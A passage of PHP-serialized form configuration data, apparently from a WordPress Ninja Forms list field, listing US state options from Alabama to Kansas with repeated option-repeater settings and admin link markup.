Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Alabama\";s:5:\"value\";s:2:\"AL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Alaska\";s:5:\"value\";s:2:\"AK\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Arizona\";s:5:\"value\";s:2:\"AZ\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"3\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Arkansas\";s:5:\"value\";s:2:\"AR\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"4\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"California\";s:5:\"value\";s:2:\"CA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"5\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Colorado\";s:5:\"value\";s:2:\"CO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"6\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:11:\"Connecticut\";s:5:\"value\";s:2:\"CT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"7\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:8;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Delaware\";s:5:\"value\";s:2:\"DE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"8\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:9;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Florida\";s:5:\"value\";s:2:\"FL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"9\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:10;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Georgia\";s:5:\"value\";s:2:\"GA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"10\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:11;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Hawaii\";s:5:\"value\";s:2:\"HI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"11\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:12;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Idaho\";s:5:\"value\";s:2:\"ID\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"12\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:13;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Illinois\";s:5:\"value\";s:2:\"IL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"13\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:14;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Indiana\";s:5:\"value\";s:2:\"IN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"14\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:15;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Iowa\";s:5:\"value\";s:2:\"IA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"15\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:16;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Kansas\";s:5:\"value\";s:2:\"KS\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"16\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 